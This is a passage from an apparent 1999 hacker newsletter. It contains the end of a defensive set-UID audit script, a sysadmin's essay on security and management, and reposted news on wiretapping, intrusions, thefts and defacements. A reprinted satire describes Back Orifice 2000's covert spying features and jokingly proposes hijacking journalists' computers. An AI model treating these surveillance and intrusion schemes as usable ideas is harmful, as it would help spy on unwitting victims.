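    if [ -z "$_new" ]; then
        return 0
    fi
    printf '%s\n' "$_new" | sed 's/^/UNREVIEWED set-UID\/set-GID file: /'
    return 1
}

# Usage (baseline path is an assumption):
#   sh suid_audit.sh --baseline / > /var/lib/suid.baseline   # review it by hand
#   sh suid_audit.sh --scan / /var/lib/suid.baseline          # run from cron
if [ "${1:-}" = "--baseline" ]; then
    list_privileged "$2"
elif [ "${1:-}" = "--scan" ]; then
    audit_privileged "$2" "$3"
fi
```

      Keep the baseline somewhere the audited machine cannot rewrite, for example on
      the dedicated log host, so a compromised server cannot quietly approve its own
      new set-UID files.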
      
      There is more that a dedicated Security Administrator
      does, but there is just too much to go through. Keep in
      mind that you should never install software from binary
      distributions if possible. With source you can read the source if
      you wish, and compile without the extra options you may
      not need. Often exploits for programs are in features in
      the software that you didn't really need, but got compiled
      in by default. Something I am not touching on too much,
      but intrusion detection can be a good way to go as well.
      There are many types of software and even hardware
      that does it. You can monitor your systems for attacks,
      attempts, or full-blown break-ins. There is a software
      called "Anti-Sniff", that is just that.. It is a sniffer
      detector. If one of your machines is compromised, and
      someone is sniffing your network for passwords, data, or
      some other information, this will detect it. You can find
      Anti-sniff at http://www.l0pht.com/antisniff/. We also
      recommend for networks with more than a couple
      machines, setting up a dedicated log host. This machine
      serves ONE function, and one alone, to log. You setup all
      your remote machines to have their syslog piped off to
      this machine. It doesn't need to be a huge box, or an
      expensive box. I have used a 486-100, running Linux on it,
      and had 35 servers logging to it. Put a 20 gig drive in it,
      and have it compress logs every so often. Works like a
      dream. If you use a big server for it, you will often find
      your management having this "Great Idea" to use it to run
      other services as well. I personally have been asked
      before to make our loghost the ssh gateway from the
      outside, I hope you can see the problems in that yourself.
      
      Something else that is difficult for companies to
      understand and put up with, and many don't, and end up
      suffering because of it, is the fact that many skilled
      Administrators spend a lot of time associating themselves
      with what would be classified by the media and the US
      government as Black hat hackers. However, they are the
      very people we are protecting networks against, and they
      often get information before we do. They are often a
      great resource for information, and even for tips when you
      have questions. You have to know both sides to be
      successful. We aren't hurting them any by securing the
      networks. There will always be networks out there that
      aren't secure. It also gives them more of a challenge in
      life, which is often something they consider fun. I
      personally don't believe in the labeling of White hats or
      Black hats, as many people who are considered to be
      black hats, go to work every day in a suit and tie, get
      paid 150k a year, and are the best security administrators
      there are. There isn't a ton like that, but some of them
      are batting for both teams. What would that make them,
      gray hats? 

      There is a bigger problem that exists. It is what we call
      Upper Management. You know, the person who signs your
      purchase orders, gives you your paycheck, and the same
      person who never thinks about security. It costs money,
      and that is bad. They think because they don't see a
      problem, don't fix. What stupid logic that is. You won't
      ever see a skilled hacker, as they will come in, get what
      they want, and disappear and perhaps never run across
      your network again. I think it is much better to have a
      cracker hit a site, than a hacker. I'd much rather have a
      server erased, or a web page changed, than to have a
      hacker come in, and rip off software, or documents, or
      project plans that my company has been working on for
      years, and sell it to competitors, or post them on some
      stock board, and make my company's stock fall 50%. 

      Upper management doesn't care about that. They either
      don't understand what security is, or just don't think it
      could happen to them. The problem is, you will rarely,
      most likely never look like a hero at your company. If you
      do get the go ahead to do serious security work, hire an
      outsider, or hire a fulltime security admin, and they do a
      good job, you won't get hacked. Life goes on as it was,
      and it seems like a waste of money. Your boss doesn't
      lose sleep at night thinking about how insecure your
      network is, but you might, since it is your fault either way
      if it gets hacked. If you don't implement security, then
      you are certainly not shown off as a hero, unless you
      track him down, file suit, and he happens to be rich, and
      your company makes a boatload of money. Not likely going
      to happen, once it's reported to the FBI, and they do their
      research, and maybe even raid someone, it's years later,
      and you have moved on to a new company. 

      You have to think up every single problem on the network,
      what could happen, and show it to your boss. Make a
      chart, show problems, and show costs. In most cases the
      cost of cleanup, and potential loss of money, is far more
      than hiring a security staff. Some Upper Management
      understand more clearly if you put it simply, such as "Do
      you get the oil in your Porsche changed from every three
      to five months? Even though nothing was wrong?". Most
      likely they do, or at least know that they SHOULD. It is
      a fact that if you keep up the maintenance schedule, you
      have fewer problems. Well, same way with computers. It is
      difficult in most companies, very difficult. Even worse if
      you are working for the government, since every penny
      has to be cleared, and it takes time. Most of the time you
      either end up doing it and never getting recognized, or
      paid. If you don't have the time, well, that would explain
      why you see so many government cracks listed on web
      page defacement sites like attrition.org. 

      It is a difficult job, and if you work for a consulting
      company, you are in luck. It most likely isn't your job to
      sell the audits, you just do them for the company who
      was convinced that they needed it. You do have a harder
      job though, and that is writing up a security policy, and
      making the company understand they MUST follow it.
      Many just want their network locked down, and don't care
      about a policy. If you only care about the money, so be
      it. If you care about doing the best job you can, getting
      the security done right, you need to make them
      understand they have to make your security policy, well,
      policy. 

      Security today, and in the past, just isn't what it needs to
      be. Most companies consider it to be a pain, and an
      expense that isn't needed or justified. Companies need to
      focus on the area, and big companies need to hire a
      fulltime security admin, or keep an open account with a
      contractor for routine security audits, and have their
      administrators trained on keeping up to date on things. All
      companies should have someone who monitors mailing lists
      like Bugtraq, or NT Bugtraq, depending on what platforms
      you are running. 

      Things need to change, and if you are in a position where
      you can do that, I suggest you do it right now. If you
      firmly believe in the future of the Internet, and
      E-commerce, I also know that if I were the only person
      buying things on-line, every e-commerce site would shut
      down, because I just can't afford to keep them all going.
      I've talked to a couple of people who say they won't buy
      anything online. They don't think their credit cards are
      secure, or their personal information. People are scared of
      it, and they keep hearing about hackers, and all these evil
      things going on that they don't understand. Many web
      sites try to comfort people, by explaining the encryption
      method for the browsers, and leave it at that. For the
      people who have been living under rocks, and have only
      heard about credit card stealing, and not about hacking,
      and computers being compromised, or for the people who
      just don't understand what that means, they think their
      data going encrypted is all there is to it. Many people
      don't realize when hackers get credit card numbers, they
      get them in bulk usually, rarely from sniffing, but from
      compromising the machine that holds these plain text files,
      or databases holding the information. 
      
      @HWA
      
09.0  Internet Wiretapping Still a Possibility 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Brian Oblivion 
      While approximately fifty-five percent of the Internet
      Engineering Task Force voted against a measure to
      include wiretapping capabilities into new protocols there
      was not a high enough objection to close the issue
      permanently. The director of the transport area of the
      IETF said that unless the proposal receives a much
      stronger objection the possibility of including these
      features still exists. 

      ZD Net       
      http://www.zdnet.com/zdnn/stories/news/0,4586,2392616,00.html?chkpt=zdnnstop
      
      
      --------------------------------------------------------------
      This story was printed from ZDNN,
      located at http://www.zdnet.com/zdnn.
      --------------------------------------------------------------
      
      Internet wiretapping still a threat
      By Robert Lemos, ZDNN
      November 11, 1999 5:24 PM PT
      URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2392616,00.html
      
      A push by law enforcement to make the Internet wiretap-friendly hit a major snag on Wednesday,
      when members of the Internet Engineering Task Force -- the body responsible for setting Internet
      standards -- overwhelmingly said 'no' to a key question.
      
      The question: Should the IETF put features in forthcoming protocols whose sole purpose is to
      facilitate wiretapping?
      
      Scott Bradner, director of the Transport Area of the IETF -- where the motion was originally
      proposed -- estimates that 55 percent of the members answered 'no,' another 15 percent said 'yes,'
      and the rest abstained.
      
      Not resolved
      While that may seem definitive, Bradner stressed that the issue remains open.
      
      "The IETF doesn't vote; we work on rough consensus," said Bradner, who stressed that without a
      large majority -- say, 80 percent -- of its members voting one way, the issue would not be resolved.
      
      "After the meeting, we are still in somewhat of an ambiguous area," he said. "There is clearly not
      strong support for doing it, but there is not strong enough support to definitively block wiretapping
      from future standards."
      
      That leaves the issue tabled for the moment, but certain to be brought up again.
      
      "This is just the beginning," said Jim Dempsey, senior staff counsel with the policy think tank Center
      for Democracy and Technology, who attended the meeting. "The vote was about 10 to 1 against, but
      that won't stop it."
      
      Expanding wire-tapping
      The whole Internet wiretapping concept is a direct result of the Communications Assistance for Law
      Enforcement Act of 1994, which requires telecommunications companies to aid law enforcement in
      legally obtained wiretaps by making their network infrastructure wiretap-friendly.
      
      For the past two years, law enforcement officials have been lobbying Congress
      and putting pressure on cellular phone companies to apply the law to their
      phone network as well. The Internet is the next communications network on
      the list.
      
      "If it is a one or a zero, or an analog signal, the government is entitled to
      intercept the signal," said CDT's Dempsey. "But does that mean they can force
      companies to design their systems to make it easy to get the signals they want,
      when they want it? That's the CALEA question."
      
      Privacy advocates such as the Electronic Privacy Information Center spoke
      out adamantly against a pro-wiretapping Internet.
      
      "... We believe that such a development would harm network security, result in
      more illegal activities, diminish users' privacy, stifle innovation, and impose
      significant costs on developers of communications," wrote EPIC in an open
      letter to the IETF. "At the same time, it is likely that Internet surveillance
      protocols would provide little or no real benefit for law enforcement."
      
      Fear of hacking
      The IETF answered more out of security concerns than any thoughts about privacy, said Bradner.
      
      "If you put in some mechanism where someone with legal authority can tap your telephone, what
      stops some hacker from doing that?" he asked.
      
      The FBI could not be reached for comment on the issue.
      
      In any event, the whole debate may be moot. The vote just barred specific development of features
      solely for wiretapping, but other pieces already present in the Internet could be used to create an
      effective wiretap.
      
      "Some people think that all the functions necessary to do an intercept may already be in the protocol
      for other reasons," said Bradner.
      
      For example, the Internet allows servers to do accounting: Finding out where a packet came from
      and where it is going. In wiretapping, such a feature is called a pen register and is considered the
      first step in narrowing down the calls that need to be tapped.
      
      CDT's Dempsey believes the vote may be moot for a different reason.
      
      "Two thousand engineers get in a ballroom and raise their hands -- that means nothing to the
      government," he said. "What it DOES mean is that they will have to go to the CEOs ... and make
      their case."
      
      @HWA
      
10.0  Stock Prices Manipulated in China 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by no0ne 
      Zhao Zhe, 28 and a former trust firm employee, received
      three years of jail time from a Chinese court and was
      ordered to pay restitution for breaking into a
      computerized trading system, and manipulating stock
      data. This allowed the pair to sell shares at higher
      prices. 

      CNNfn
      http://www.cnnfn.com/1999/11/12/emerging_markets/wires/china_hacker_wg/
      
      Wired
      http://www.wired.com/news/reuters/0,1349,32512,00.html
      
      Nando Times       
      http://www.techserver.com/noframes/story/0,2294,500057111-500094072-500360224-0,00.html
      
      CNNfn
      
      
      Chinese hacker jailed 
      Former trust firm staffer found guilty of
      hacking into stock system 
      November 12, 1999: 10:24 a.m. ET


      SHANGHAI (Reuters) - A Chinese court jailed a
      former trust firm worker for three years Friday for
      hacking into a computerized stock trading system
      and manipulating prices, a court official said. 
      The Shanghai court found Zhao Zhe, 28, guilty of
      rigging stock data so that he could sell shares at
      inflated prices, he said. 
      Zhao, a former employee of the Shanghai branch
      of the Shijiazhuang Trust and Investment Co., was
      also ordered to pay 2.9 million yuan ($355,200) in
      compensation for trading losses, had illegal income
      confiscated and was also fined 10,000 yuan. 
      "This is a rare case for China," said the court
      official. "We don't see hackers breaking into stock
      trading systems very often." 
      The court found Zhao guilty of breaking into the
      computer system of the Shanghai branch of a
      securities company and inflating the prices for
      Shanghai Xing Ye Real Estate Co. and Henan Lotus
      Flower Gourmet Powder Co. 
      Prices of the two companies' domestic shares
      rose their daily limit of 10 percent in unusually heavy
      trade as a result of the price manipulation, according
      to the official media. 
      The Shanghai stock exchange has said prices in
      its computerized system were affected by the false
      information and it has vowed to take steps to
      strengthen computer security. 

      -==-
      
      Wired;
      
      Stock Hacker Jailed in China 
      Reuters 

      8:00 a.m. 12.Nov.1999 PST 
      SHANGHAI -- A Chinese court jailed a former trust firm worker for 
      three years on Friday for hacking into a computerized stock trading
      system and manipulating prices, a court official said. 

      The Shanghai court found Zhao Zhe, 28, guilty of rigging stock data
      so that he could sell shares at inflated prices, the official said. 

      Zhao, a former employee of the Shanghai branch of the Shijiazhuang 
      Trust and Investment Co., was also ordered to pay 2.94 million yuan 
      (US$355,200) in compensation for trading losses, had his illegal 
      income confiscated and was fined an additional 10,000 yuan. 

      "This is a rare case for China," said the court official. "We don't
      see hackers breaking into stock trading systems very often." 

      The court found Zhao guilty of breaking into the computer system of
      the Shanghai branch of a Hainan securities company and inflating the
      prices for Shanghai Xing Ye Real Estate Co. and Henan Lotus Flower 
      Gourmet Powder Co. 

      Prices of the two companies' domestic currency A shares rose their 
      daily limit of 10 percent in unusually heavy trade as a result of 
      the price manipulation, according to the official media. 

      The Shanghai stock exchange has said prices in its computerized system
      were affected by the false information and it has vowed to take steps 
      to strengthen computer security. 

      Copyright 1999 Reuters Limited. 
      
      -=-
      
      Nando Times;
      
      China jails hacker for 3 years 

      Copyright © 1999 Nando Media
      Copyright © 1999 Agence France-Press

      BEIJING (November 14, 1999 8:07 a.m. EST http://www.nandotimes.com) - 
      In the first such case in China, a computer hacker convicted of manipulating
      prices on the Shanghai Securities Exchange was sentenced to three years in 
      prison, state media said Sunday. 

      Zhao Zhe, a staff member at a securities company, broke into the computer
      system of the Shanghai Securities Department of the Sanya Zhongya Trust 
      Investment Company and changed five transaction records, the Xinhua news 
      agency said.

      He caused the turnover of two stocks to rise drastically and brought about a
      direct loss of 2.95 million yuan (the equivalent of $355,000), Xinhua said. 

      The hacker was also fined 10,000 yuan - the equivalent of $1,200. 

      @HWA
 
11.0  Rumours: Vent of Level Seven raided by FBI?
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      This came to light on one of the channels I frequent, it's unconfirmed at 
      this point but looks bad for vent if this is true. Keep in mind people
      say all sorts of stuff on IRC and it's not all true, although I see no
      reason for vent to make something like this up - Ed
      
      [12:05] <tnev>  _________________________________________
      [12:05] <tnev> | tnev (vent@ccxxxxxx-a.xxxxxx.xx.home.com)
      [12:05] <tnev> | name : beat cancer, over dose [Level Seven]
      [12:05] <tnev> | chan : <deleted>
      [12:05] <tnev> | serv : irc.home.com
      [12:05] <tnev> | idle : 8hrs 45mins 40secs
      [12:05] <tnev> heh, im idle too much
      [12:05] <tnev> yea, i got fucking raided
      [12:05] <tnev> i gotta go to court
      [12:06] <tnev> and shit
      [12:06] <tnev> prolly scared straight
      [12:06] <tnev> for everything else i did
      [12:07] <tnev> ...maybe.
      [12:07] <tnev> level seven is surely dead
      [12:07] <tnev> fbi knows about us
      [12:07] <tnev> and they wanna give us 12 yrs for the usembassy hack
      [12:07] <tnev> cause of some 'stolen documents'
      [12:08] <tnev> and because of the message we left
      [12:08] <tnev> on the site
      [12:08] <tnev> 3 days after the actual usembassy bombing
      
      @HWA
      
12.0  Electronic Information Stolen from Egypt 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/ 

      contributed by Evil Wench 
      With all the hype about electronic break ins,
      cyber-intruders, and internet terrorists it is sometimes
      easy to forget about the physical world. On October 6th
      of this year Egypt discovered several computer disks
      had been stolen from the University of Cairo. The disks
      contained classified information about the country's
      natural resources such as gold, copper and uranium
      reserves. 

      Nando Times         
      http://www.nandotimes.com/technology/story/body/0,1634,500057186-500094173-500360964-0,00.html
      
      
      Secrets about Egypt's natural resources stolen 
      
      Copyright © 1999 Nando Media
      Copyright © 1999 Agence France-Press
      
      CAIRO (November 14, 1999 12:10 p.m. EST http://www.nandotimes.com) - 
      Egyptian police are investigating the Oct. 6 theft from Cairo University 
      of dozens of computer disks containing classified information about the 
      African nation's natural resources, university security officials 
      disclosed Sunday. 

      University employees, including members of the geography department, are 
      being questioned about the theft, which took place more than a month ago, 
      but the officials said the investigation had not yet yielded any results. 

      The disks contain information on the location of oil, gas and uranium 
      fields as well as gold and copper deposits and other classified 
      geographical information, university sources said. 

      The pro-government Al-Ahram newspaper reported that the disks also 
      contained the results of all Egyptian geographical studies carried out 
      over the past two centuries. 

      It was not clear if the disks contained the only copies of the information 
      or why the Oct. 6 crime has not been publicized before now. 

      In early 1998, Egypt had oil and gas reserves of 1,090 million oil equivalent
      tons, according to oil ministry sources. No figures were available for gold 
      and uranium reserves. 
      
      @HWA
      
13.0  Aleph One Gives NPR Interview 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by oolong 
      Aleph One (Elias Levy), the administrator of the BugTraq
      mailing list and the CTO of Security Focus.com, was
      interviewed on National Public Radio on the topic of
      "Cyber Terrorism" last Friday. 

      NPR - archived .ram file of the interview       
      http://www.npr.org/ramfiles/me/19991112.me.10.ram
      
      @HWA
      
14.0  South American Con Announced 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/


      contributed by Space Rogue 
      Whoa, a hacker convention in Bogota, Colombia. It's
      coming up very soon. Check out Col Con '00. 

      HNN Cons Page       
      http://www.hackernews.com/cons/cons.html
      
      @HWA
      
15.0  c
      ~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by Space Rogue 
      Issue one of Camarilla, a new zine with articles on
      computers, networking, telephony, humor and
      everything in between has been released.

      Camarilla
      http://camarilla.hektik.org
      
      @HWA
      
16.0  BO2K Marketing Plan (Very funny reading, check this out)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Dildog 
      What if Back Orifice 2000 was a commercial product? It
      would need a marketing plan. Just how would you
      market BO2K to the masses? Adam Penenberg had 5 top
      PR firms design a marketing campaign for BO2K, and
      some of the ideas are pretty wacky. 

      Forbes       
      http://www.forbes.com/columnists/penenberg/
      
      They sure don't make press agents like James Sterling Moran anymore. The
      undisputed Master of the Publicity Stunt, Moran, who at 91 recently passed
      on to that great File-O-Fax in the sky, reeled off a number of Lucy
      Ricardo-like schemes to sop up media attention in his lifetime. According to
      his obituary, he once walked a bull through a china shop, sat on an ostrich
      egg for 19 days until it hatched and looked for a needle in a haystack.
      
        But Moran's most inspired plan never got off the ground: Flying a midget
      over Central Park on a kite. The cops put the kibosh on that, prompting
      Moran to quip "It's a sad day for American capitalism when a man can't fly a
      midget on a kite over Central Park."
      
        Some publicists believe stunts like Moran's have gone the way of castor oil,
      manual typewriters, prohibition and vaudeville, but I think they would go
      over well today. (Look at Dennis Rodman or John Wayne Bobbitt.) With the
      emergence of the Internet there are now thousands of content-starved media
      outlets hovering in cyberspace.
      
        With this in mind I decided to ask five top PR firms to design a Moran-like
      marketing campaign for a decidedly spooky product: Back Orifice 2000 ("BO2K"
      for short, a not so subtle dig at Microsoft's "Back Office"), a software
      created by the hacker group Cult of the Dead Cow.
      
        BO2K has many intriguing functions. It can be covertly installed on a
      victim's hard drive, then used to control the computer from a remote
      location. That way the nefarious hacker could access your E-mail, pull up
      your surfing history, rifle through your personal files, trash your system.
      But wait! There's more! BO2K also serves as a nifty surveillance tool; it
      can automatically turn on microphones and cameras on victims' computers so
      you can watch your coworkers without their knowledge.
      
        Another popular remote-access hacker tool called Netbus recently became
      commercially available, so I decided to price BO2K competitively: $15, the
      same as Netbus.
      
      Here's what the PR tsars and tsarinas came up with:
      
      
      Worry warts
      
        A huge revenue upside opportunity could be realized if the Cult of the Dead
      Cow were to focus on potentially the most lucrative market for its product:
      the paranoid corporate executive. As most technology products are targeted
      to specific market categories (with resultant product feature-set
      tailoring), following is a recommendation for marketing and promotion for
      this segment:
      
      Product Name: "CEO's Big Brother"
      
      Product Pricing: $15 per employee, plus free tech-support (from a trusted
      third-party vendor).
      Feature set: Basic BO2K with spy attachments.
      Market: Allows the busy, perpetually paranoid executive the ability to
      check on staff on a 24/7 multimedia basis (with remote spy attachments for
      audio/video). Works equally well with potentially back-stabbing board
      members and pesky competitors.
      Strategy/Implementation: Reach audience with multisite live product
      launch.
      
      Campaign specifics:
      
      Live demonstrations at all airport shuttle terminals (Boston, NY, DC, LA,
      Orange County, SF) with free 30-day trial disks handed out.
      
      Create partnership campaign with large hotel chain (e.g., Hyatt). Product
      kit with same trial disks handed to all executive business travelers.
      
      Commission survey with results that will demonstrate the need for remote
      monitoring to reinforce product category viability (e.g., "52% of American
      workers cite their No. 1 use of the Internet at work as a means of looking for
      another job, while only 10% use computers to increase their
      productivity..."). Include survey in media kit.
      
      Endorsements: Reach out to high-profile CEOs like Gil Amelio, Mike Ovitz,
      Ross Perot, for "if only I'd had this product" testimonials.
      
      Market beta testers' experience as "management success" stories to key
      business media publications, pre-launch (timing to hit week of launch).
      Post-launch: Have Cult member coauthor book with Donald Trump,
      tentatively entitled "Art of the Steal," a blueprint for getting competitive
      data (BO2K) and what to do with it once you've gotten it. Resultant 15-city
      book tour and TV campaign.
      
      --Michelle Zawrotny, Phase Two Strategies, San Francisco
      
      
      Go viral
      
        Our plan would appeal to the driving factors that, in some combination,
      motivate all hackers--the prospect of fame, conquering a challenge, dissing
      the establishment and earning the respect of their peers.
      
        To appropriately brand and market BO2K to a retail audience we would employ
      a viral marketing campaign (naturally!) to promote and, indeed, exploit
      various hacker feats. Under the slogan of "Got Code?" the Cult of the Dead
      Cow could sponsor a hacker contest to illustrate the uses of Back Orifice
      most effectively.
      
        The best hackers would be eligible for various prizes, including hacker
      lifestyle gear (extra-padded chairs, official "Star Trek" paraphernalia),
      dinner and a movie with Linus Torvalds (the undisputed king of open source
      technologies), and the grand prize: A live cow presented to the lucky winner
      at Defcon, the annual hacker convention held in Las Vegas, by the entire
      Cult of the Dead Cow, dressed in billowing monks robes with hoods.
      
        The publicity for the contest itself would be equally viral: The Cult could
      hack into web sites (with permission so they don't violate the law, although
      the public doesn't need to know that) to post its marketing message.
      
      --  Jesse Ciccone and Todd Evans of FitzGerald Communications Inc., San
      Francisco office
      
      "You've got BO!"

        Here's a PR recipe for BO2K to get on the straight and narrow: Seize the
      controversy, play the contrarian, tout a celebrity spokesperson and engage
      in some reverse engineering. Timing is crucial. Start the campaign in late
      December. With Y2K only days away, concerns about cyber-terrorism and
      accidental missile launches will be at a fever pitch.
        
        Members of The Cult of the Dead Cow will rush to the Nation's Capital,
      wearing white hats. Speaking from an outdoor press conference in a muddy
      Silicon Swamp, i.e. Washington Mall, they will address officials from the
      government and private industry and offer to serve as exclusive security
      consultants to the American government. We'll be sure to spike the audience
      with business celebrities, lawyers from the Department of Justice's
      antitrust case against Microsoft and politicians who want to "hip up" their
      image. In addition, hacker groupies will be paid to sit Indian-style across
      the Capital police barricades and conduct a computer security vigil.
      
         To erect the long-term campaign, Pamela Anderson Lee, wearing a G-string,
      will be signed to appear in a rock-video music stream composed and performed
      by her mercurial mate, Tommy Lee. In a revealing display of BO2K's spy
      attachments, she and her husband will be "caught" fooling around in private
      by the BO2K spy cam. When they realize they've been caught, she'll look into
      the camera and say, "$15 buys you the BO2K software, tickets for two to
      'Takedown', the upcoming film about hacker Kevin Mitnick, plus friend and
      family shares in the Cult's upcoming IPO."
      
       Lee will then point proudly to the new tag line pinned on her derrière:
      "You've got B.O.!"
      
       I expect that within a month downloads will shatter all previous records.
      
      --Marco Greenberg, president of NYPR, New York City
      
      
      White collar control
      
       If I were hired to come up with a publicity campaign for Back Orifice 2000,
      I'd pitch the product as the perfect personal security program for the busy
      executive. Let's face it: Hackers don't have money; it's the enterprise
      market where they could reap rewards.
      
       You have to tailor a message that strikes a chord with high-powered
      businesspeople. Relate to their experiences, the fact that they spend much
      of their time on the road--moving important documents from laptop to
      desktop and back to laptop. Always looking ahead, they sometimes forget to
      look behind. I'd make sure they realize that BO2K makes it possible to keep
      on top of what's happening back at the office--who's in your office, what
      documents they are reading, what people are saying (You have to love those
      spy attachments). I'd tell them: As a CEO or CFO, don't you want to know
      who's reading through your files while you're out raising more venture
      capital? Wouldn't it be good to know whether anyone was in your office when
      you weren't there?
      
      With BO2K you can find out--and better still for the power-hungry board
      chairman or CEO--take action.
      
      --Lauren Hackett, account supervisor, Middleberg+Associates, New York City
      
      
      Operation anthrax
      
       To effectively demonstrate the capabilities of Back Orifice 2000 to
      journalists, we must have them experience its potential first hand. We
      recommend a guerilla media campaign on behalf of the Cult Of The Dead Cow,
      which we propose to call "Operation anthrax."
      
       On a to-be-determined date, our agency and "the Cow" would use BO2K to
      clandestinely take over the computers of 50 targeted journalists,
      representing both the print and electronic mediums. Simultaneously, BO2K
      would pirate the surveillance equipment in Federal Reserve Chairman Alan
      Greenspan's office and feed the captured video and audio information
      straight to selected reporters' desktops, giving them total unabridged
      access to the puppeteer of global finance. (We'll call it "The Greenspan
      Cam.") Cult members could finish up by discussing BO2K's most powerful
      assets via video to a captive journalism audience.
      
        If Operation Anthrax doesn't generate the desired amount of media
      penetration, fear not. We would be glad to use BO2K to control the presses
      of the top 100 dailies. And isn't that every publicist's dream? To bypass
      the journalist completely and place our own story anywhere we want (above
      the fold, naturally).
      
      --Dave Quast, Nicki Gladney and Michael Prichinello of RLM Public Relations, New York City

      @HWA
      
17.0  Canada Loses Classified Documents 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by William Knowles 
      The Canadian Security Intelligence Service has reported
      the theft of top secret files from the back seat of an
      agent's car. It is believed that the thieves did not know
      what they had and just threw the files away. (Hey, let's
      not forget about physical security.) 

      South China Morning Post 
      http://www.scmp.com/News/World/Article/FullText_asp_ArticleID-19991115030656052.asp
      

      Late Update: 1145EST 
      This article has a few more details on the above
      escapade. 

      The Toronto Star       
      http://www.thestar.ca/thestar/back_issues/ED19991113/news/991113NEW07_NA-SPY13.html
      
      South China Morning Post;
      
      Monday, November 15, 1999
                            
      NORTH AMERICA TODAY

      Top-secret files stolen from back seat of agent's car

      MURRAY CAMPBELL in Toronto 

     There are red faces all around at Canada's spy
     organisation after top-secret documents were stolen from
     the back seat of an agent's car. 

     In what is being described as the most serious security
     breach in 20 years, documents outlining the future plans
     of the Canadian Security Intelligence Service (CSIS)
     were stolen last month by drug addicts while the agent
     was watching an ice-hockey game in Toronto. 

     The thieves were apparently looking for money when
     they saw a briefcase in the car parked outside the arena
     where the Toronto Maple Leafs play. 

     And a police investigation has concluded that the
     sensitive documents were later tossed into a rubbish bin
     and ended up in a landfill site. 

     The CSIS, which was formed in 1984, is responsible for
     counter-intelligence and counter-terrorism efforts in
     Canada. 

     The agency, which is charged with guarding the
     Government's deepest secrets, is extremely embarrassed
     by the lapse. 

     CSIS officials were trying to play down the importance of
     the documents, saying they contained no details of
     intelligence sources or specifics of operations. 

     But an agency official was forced to conclude "we
     consider the loss of the documents to be a serious matter
     of national security". 

     It is not the first time the CSIS has slipped up. Earlier this
     autumn, there were reports that one of its spooks had
     posted on the Internet the names and pictures of
     Canadian fighter pilots who served in the Balkans war. 

     In another incident, a computer disc containing the names
     of targets of CSIS intelligence probes was found by a
     member of the public. 

     "This is simply a debacle," said Jim Abbott, an MP with
     the opposition Reform Party. "We look like we are in
     amateur hour." 

     But even as cartoonists and satirists feasted on the story,
     there were warnings that Canada's spy agency was now
     seriously compromised. The country is not a specific
     target for terrorists but its proximity to the United States
     and its open access to banking and telecommunications
     make it attractive to terrorist groups. 
     
     
     -=-
     
     Toronto Star;
     http://www.thestar.ca/thestar/back_issues/ED19991113/news/991113NEW07_NA-SPY13.html
     
     
     Spy agencies launch probe after secret document stolen 

                    By William Walker 
               Toronto Star Ottawa Bureau Chief

      OTTAWA - Twin investigations are under way to ensure that
      no Canadian Security Intelligence Service officer ever leaves
      confidential documents sitting in a public place, officials say. 

      The probes follow an incident last month outside the Air
      Canada Centre in Toronto where three smash-and-grab artists,
      described by police as drug addicts, broke into a car and stole a
      confidential CSIS operational plan. 

      The first investigation is being conducted internally by CSIS
      itself, said agency spokesperson Phil Gibson. 

      ``Clearly we don't contemplate employees walking around with
      these kinds of documents, that's for sure,'' he said in an
      interview yesterday. 

      The CSIS officer whose car window was smashed isn't being
      identified by the agency. The person has not been reprimanded
      yet, but will be dealt with when the CSIS investigation ends
      soon, Gibson said. 

      The second probe involves the civilian Security Intelligence
      Review Committee (SIRC), a watchdog agency that includes
      former Ontario premier Bob Rae among its members. 

      That agency has complete access to CSIS personnel and files
      for the purpose of its investigation and is expected to make a
      report public which could lead to changes in how such
      documents are handled in future. 

      Gibson said the document stolen was an ``annual operational
      report'' but not the agency's annual report to the
      solicitor-general. 

      Asked how detailed the information contained within the
      document was, Gibson said: ``It was broad.'' 

      CSIS has now concluded the document is irretrievable. It is
      believed the thieves, who were arrested within days, threw a
      briefcase containing the papers in a dumpster. 
      
      
      (See? you NEVER know what you'll find in a dumpster these 
       days, bodies, guns, manuals and secret philez heh... - Ed)
      
      
      @HWA
      
18.0  Guilty Plea in Media City Defacement 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by no0ne 
      18 year old student Edwin Lim Zhaoming pleaded guilty
      to 17 charges of breaking into the Mediacity, the
      Television Corporation of Singapore's website. The teen,
      who renamed the site "Mediashity" last June 15, will be
      sentenced at a later date. His accomplice, a 15 year old
      Myanmar national was sentenced to 12 months
      probation and 100 hours of community service. 

      The Straits Times       
      http://straitstimes.asia1.com.sg/cyb/cyb8_1116.html
      (404: url not found)
      
      @HWA
      
19.0  Hong Kong's Department of Highways Defaced 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by no0ne 
      The web site of Hong Kong's Department of Highways
      which originally offers bilingual information and guides
      regarding HK's road system was defaced Friday night.
      The intruders changed the index page into one with a
      white background and three lines of quotes from various
      people. 

      Yahoo News       
      http://au.dailynews.yahoo.com/headlines/151199/nbtech/942645300-3893108747.html
      
      Monday 15 November 4:55 PM
      
      Hong Kong Highways Department Website Hacked - Update
      
      The director of the Hong Kong Highways Department said that repairs to his 
      department's Website, which was defaced by hackers on Friday night, would 
      have to wait until staff arrived for work on Monday morning. 

      The Website at http://www.hyd.gov.hk , normally offers bilingual 
      information on Hong Kong's road system including maps, press releases and 
      other information. 

      But instead of a helping of Hong Kong highway news, visitors to the site 
      found a plain white page with three lines of hacker quotes.

      When IT Daily contacted Leung on Saturday for comments on the break-in, he 
      said that he was unaware of the incident and since his office was closed, 
